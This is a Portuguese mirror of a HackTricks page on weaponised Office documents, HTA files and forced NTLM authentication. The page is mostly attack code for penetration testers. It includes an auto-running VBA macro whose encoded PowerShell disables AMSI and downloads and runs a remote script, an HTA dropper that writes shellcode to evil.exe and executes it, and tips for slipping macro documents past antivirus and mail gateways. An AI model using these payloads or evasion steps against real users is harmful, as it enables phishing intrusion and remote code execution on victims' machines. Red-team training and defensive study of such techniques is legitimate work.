mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-30 06:53:11 +00:00
180 lines
9.7 KiB
Markdown
180 lines
9.7 KiB
Markdown
# Arquivos e Documentos de Phishing
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
## Documentos de Escritório
|
|
|
|
O Microsoft Word realiza a validação dos dados do arquivo antes de abri-lo. A validação dos dados é feita na forma de identificação da estrutura de dados, em conformidade com o padrão OfficeOpenXML. Se ocorrer algum erro durante a identificação da estrutura de dados, o arquivo em análise não será aberto.
|
|
|
|
Normalmente, arquivos do Word contendo macros usam a extensão `.docm`. No entanto, é possível renomear o arquivo alterando a extensão e ainda manter suas capacidades de execução de macros.\
|
|
Por exemplo, um arquivo RTF não suporta macros, por design, mas um arquivo DOCM renomeado para RTF será tratado pelo Microsoft Word e será capaz de executar macros.\
|
|
Os mesmos internos e mecanismos se aplicam a todos os softwares da suíte Microsoft Office (Excel, PowerPoint etc.).
|
|
|
|
Você pode usar o seguinte comando para verificar quais extensões serão executadas por alguns programas do Office:
|
|
```bash
|
|
assoc | findstr /i "word excel powerp"
|
|
```
|
|
### Carregamento de Imagem Externa
|
|
|
|
Vá para: _Inserir --> Partes Rápidas --> Campo_\
|
|
_**Categorias**: Links e Referências, **Nomes de Campos**: includePicture e **Nome do Arquivo ou URL**:_ http://\<ip>/whatever
|
|
|
|
![](<../../.gitbook/assets/image (316).png>)
|
|
|
|
### Backdoor de Macros
|
|
|
|
É possível usar macros para executar código arbitrário a partir do documento.
|
|
|
|
#### Funções de Carregamento Automático
|
|
|
|
Quanto mais comuns forem, mais provável é que o AV as detecte.
|
|
|
|
* AutoOpen()
|
|
* Document\_Open()
|
|
|
|
#### Exemplos de Código de Macros
|
|
```vba
|
|
Sub AutoOpen()
|
|
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
|
|
End Sub
|
|
```
|
|
|
|
```vba
|
|
Sub AutoOpen()
|
|
|
|
Dim Shell As Object
|
|
Set Shell = CreateObject("wscript.shell")
|
|
Shell.Run "calc"
|
|
|
|
End Sub
|
|
```
|
|
|
|
```vba
|
|
Dim author As String
|
|
author = oWB.BuiltinDocumentProperties("Author")
|
|
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
|
|
.StdIn.WriteLine author
|
|
.StdIn.WriteBlackLines 1
|
|
```
|
|
|
|
```vba
|
|
Dim proc As Object
|
|
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
|
|
proc.Create "powershell <beacon line generated>
|
|
```
|
|
#### Remover manualmente metadados
|
|
|
|
Vá para **Arquivo > Informações > Inspecionar Documento > Inspecionar Documento**, o que abrirá o Document Inspector. Clique em **Inspecionar** e depois em **Remover Tudo** ao lado de **Propriedades do Documento e Informações Pessoais**.
|
|
|
|
#### Extensão do documento
|
|
|
|
Ao terminar, selecione o menu suspenso **Salvar como tipo**, altere o formato de **`.docx`** para **Word 97-2003 `.doc`**.\
|
|
Faça isso porque você **não pode salvar macros dentro de um `.docx`** e há um **estigma** em torno da extensão de macro ativada **`.docm`** (por exemplo, o ícone em miniatura tem um `!` enorme e alguns gateways web/email os bloqueiam completamente). Portanto, essa **extensão legada `.doc` é o melhor compromisso**.
|
|
|
|
#### Geradores de Macros Maliciosas
|
|
|
|
* MacOS
|
|
* [**macphish**](https://github.com/cldrn/macphish)
|
|
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
|
|
|
|
## Arquivos HTA
|
|
|
|
Um HTA é um programa do Windows que **combina HTML e linguagens de script (como VBScript e JScript)**. Ele gera a interface do usuário e é executado como um aplicativo "totalmente confiável", sem as restrições do modelo de segurança de um navegador.
|
|
|
|
Um HTA é executado usando **`mshta.exe`**, que normalmente está **instalado** juntamente com o **Internet Explorer**, tornando o **`mshta` dependente do IE**. Portanto, se ele foi desinstalado, os HTAs não poderão ser executados.
|
|
```html
|
|
<--! Basic HTA Execution -->
|
|
<html>
|
|
<head>
|
|
<title>Hello World</title>
|
|
</head>
|
|
<body>
|
|
<h2>Hello World</h2>
|
|
<p>This is an HTA...</p>
|
|
</body>
|
|
|
|
<script language="VBScript">
|
|
Function Pwn()
|
|
Set shell = CreateObject("wscript.Shell")
|
|
shell.run "calc"
|
|
End Function
|
|
|
|
Pwn
|
|
</script>
|
|
</html>
|
|
```
|
|
|
|
```html
|
|
<--! Cobal Strike generated HTA without shellcode -->
|
|
<script language="VBScript">
|
|
Function var_func()
|
|
var_shellcode = "<shellcode>"
|
|
|
|
Dim var_obj
|
|
Set var_obj = CreateObject("Scripting.FileSystemObject")
|
|
Dim var_stream
|
|
Dim var_tempdir
|
|
Dim var_tempexe
|
|
Dim var_basedir
|
|
Set var_tempdir = var_obj.GetSpecialFolder(2)
|
|
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
|
|
var_obj.CreateFolder(var_basedir)
|
|
var_tempexe = var_basedir & "\" & "evil.exe"
|
|
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
|
|
For i = 1 to Len(var_shellcode) Step 2
|
|
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
|
|
Next
|
|
var_stream.Close
|
|
Dim var_shell
|
|
Set var_shell = CreateObject("Wscript.Shell")
|
|
var_shell.run var_tempexe, 0, true
|
|
var_obj.DeleteFile(var_tempexe)
|
|
var_obj.DeleteFolder(var_basedir)
|
|
End Function
|
|
|
|
var_func
|
|
self.close
|
|
</script>
|
|
```
|
|
## Forçando a Autenticação NTLM
|
|
|
|
Existem várias maneiras de **forçar a autenticação NTLM "remotamente"**, por exemplo, você pode adicionar **imagens invisíveis** a e-mails ou HTML que o usuário acessará (até mesmo HTTP MitM?). Ou enviar à vítima o **endereço de arquivos** que irão **disparar** uma **autenticação** apenas para **abrir a pasta**.
|
|
|
|
**Confira essas ideias e muito mais nas páginas a seguir:**
|
|
|
|
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
|
|
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
|
|
{% endcontent-ref %}
|
|
|
|
{% content-ref url="../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md" %}
|
|
[places-to-steal-ntlm-creds.md](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md)
|
|
{% endcontent-ref %}
|
|
|
|
### Revezamento NTLM
|
|
|
|
Não se esqueça de que você não só pode roubar o hash ou a autenticação, mas também **realizar ataques de revezamento NTLM**:
|
|
|
|
* [**Ataques de revezamento NTLM**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
|
|
* [**AD CS ESC8 (revezamento NTLM para certificados)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|